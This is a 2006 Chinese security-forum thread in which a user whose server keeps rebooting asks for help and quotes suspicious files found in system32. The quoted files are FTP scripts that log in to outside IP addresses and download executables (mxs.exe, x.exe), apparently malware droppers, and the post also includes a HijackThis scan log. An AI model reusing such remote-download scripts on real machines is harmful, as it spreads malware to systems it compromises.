至今没人解决的问题!! - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 系统软件至今没人解决的问题!!

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

至今没人解决的问题!!

wwsm5200 初生襁褓狮帖子:13 注册: 2006-10-12 来自:	发表于： 2006-10-13 10:04 \| 只看楼主短消息资料字号：小中大 1楼至今没人解决的问题!! 单位服务器遇到一个怪问题: 服务器不定时重新启动! 然后在 winnt\system32下出现 scontrol.inf mxs.exe x.exe 文件 inf文件打开出现代码: open 218.82.132.X 20951 user blah blah pass blah get mxs.exe quit 另一个 i. 文件出现代码: open 218.63.173.x 6497 user 1 1 get x.exe quit 是不是打开单位的ip地址上的端口用户名和密码进入啊有哪位达人知道帮帮我吧 2006-10-13 09:58:37
wwsm5200 初生襁褓狮帖子:13 注册: 2006-10-12 来自:	分享到：

wwsm5200 初生襁褓狮帖子:13 注册: 2006-10-12 来自:	发表于： 2006-10-13 10:06 \| 只看楼主短消息资料字号：小中大 2楼扫描结果: HijackThis@Qoo的扫描日志 V1.97.7 Scan saved at 9:35:56, on 2006-10-13 Platform: Windows 2000 SP4 (WinNT 5.00.2195) MSIE: Internet Explorer v5.00 SP4 (5.00.2920.0000) Running processes: C:\WINNT\System32\smss.exe C:\WINNT\system32\winlogon.exe C:\WINNT\system32\services.exe C:\WINNT\system32\lsass.exe C:\WINNT\System32\SCardSvr.exe C:\WINNT\system32\svchost.exe C:\WINNT\system32\spoolsv.exe C:\Program Files\Trend\SProtect\SpntSvc.exe C:\Program Files\Trend\SProtect\StWatchDog.exe C:\Program Files\Trend\SProtect\StOPP.exe C:\WINNT\System32\msdtc.exe C:\Compaq\vcagent\vcagent.exe C:\WINNT\system32\Dfssvc.exe C:\WINNT\System32\svchost.exe D:\PKPM\NetServer\PkpmSvr.exe C:\compaq\hpdiags\hpdiags.exe C:\WINNT\System32\ismserv.exe C:\WINNT\System32\llssrv.exe C:\WINNT\system32\ntfrs.exe D:\oracle\ora92\BIN\TNSLSNR.exe d:\oracle\ora92\bin\ORACLE.EXE C:\Program Files\PeanutHull3\PhCore.exe C:\WINNT\system32\regsvc.exe D:\mati3\resin-2.1.14\bin\httpd.exe C:\WINNT\System32\locator.exe d:\Program Files\RTXServer\bin\adminserver.exe D:\mati3\j2sdk1.4.2_04\bin\java.exe d:\Program Files\RTXServer\bin\event.exe d:\Program Files\RTXServer\bin\RTXGateway.exe d:\Program Files\RTXServer\bin\SDKServer.exe d:\Program Files\RTXServer\bin\FrontServer.exe C:\WINNT\system32\MSTask.exe d:\Program Files\RTXServer\bin\RTXServer.exe C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe C:\WINNT\System32\snmp.exe C:\WINNT\System32\WBEM\WinMgmt.exe C:\WINNT\system32\svchost.exe C:\WINNT\System32\CPQNiMgt\cpqnimgt.exe C:\WINNT\System32\CpqRcmc.exe C:\WINNT\System32\CPQMgmt\CqMgServ\cqmgserv.exe C:\WINNT\System32\CPQMgmt\CqMgStor\cqmgstor.exe d:\Program Files\RTXServer\bin\directory.exe C:\WINNT\System32\sysdown.exe C:\WINNT\System32\CPQMgmt\CqMgHost\cqmghost.exe C:\WINNT\System32\CPQMgmt\cpqwmgmt.exe d:\Program Files\RTXServer\bin\meetsvr.exe d:\Program Files\RTXServer\bin\infoserver.exe C:\WINNT\System32\svchost.exe C:\WINNT\system32\cmd.exe C:\WINNT\system32\FTP.EXE C:\WINNT\system32\cmd.exe C:\WINNT\system32\FTP.EXE C:\WINNT\Explorer.EXE C:\WINNT\system32\Atiptaxx.exe C:\WINNT\system32\cpqteam.exe C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe D:\PKPM\NetServer\PkpmSvr.exe C:\Program Files\西安方舟计算机公司\桥梁通CAD服务器\QLTServer.exe C:\WINNT\system32\ctfmon.exe C:\Program Files\PeanutHull3\PhMain.exe C:\WINNT\System32\mdm.exe C:\WINNT\system32\wuauclt.exe C:\Program Files\WinRAR\WinRAR.exe C:\DOCUME~1\ADMINI~1.MAI\LOCALS~1\Temp\Rar$EX00.765\HijackThis.exe O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx O4 - HKLM\..\Run: [AtiPTA] Atiptaxx.exe O4 - HKLM\..\Run: [CPQTEAM] cpqteam.exe O4 - HKLM\..\Run: [IMSCMig] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMSC40A\IMSCMIG.EXE /Preload O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe O4 - HKLM\..\Run: [FTSafeNetRockey6Service-pkpm] D:\PKPM\NetServer\PkpmSvr.exe -systray O4 - HKLM\..\Run: [QLTServer] C:\Program Files\ O4 - HKCU\..\Run: [ctfmon.exe] ctfmon.exe O4 - HKCU\..\Run: [PhMain] C:\Program Files\PeanutHull3\PhMain.exe O4 - Startup: NTUSER.DAT O4 - Startup: ntuser.dat.LOG O4 - Startup: ntuser.ini O4 - Global Startup: ntuser.pol O8 - Extra context menu item: 导出到 Microsoft Office Excel(&X) - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: Related (HKLM) O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM) O14 - IERESET.INF: SEARCH_PAGE_URL= O14 - IERESET.INF: START_PAGE_URL= O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = maincenter.com O17 - HKLM\System\CCS\Services\Tcpip\..\{BFDF6EA4-8677-4C04-B84E-4B22E531684C}: NameServer = 192.168.0.2,202.96.209.6 O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = maincenter.com O17 - HKLM\System\CS1\Services\Tcpip\..\{BFDF6EA4-8677-4C04-B84E-4B22E531684C}: NameServer = 192.168.0.2,202.96.209.6 O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = maincenter.com O17 - HKLM\System\CS2\Services\Tcpip\..\{BFDF6EA4-8677-4C04-B84E-4B22E531684C}: NameServer = 192.168.0.2,202.96.209.6
wwsm5200 初生襁褓狮帖子:13 注册: 2006-10-12 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT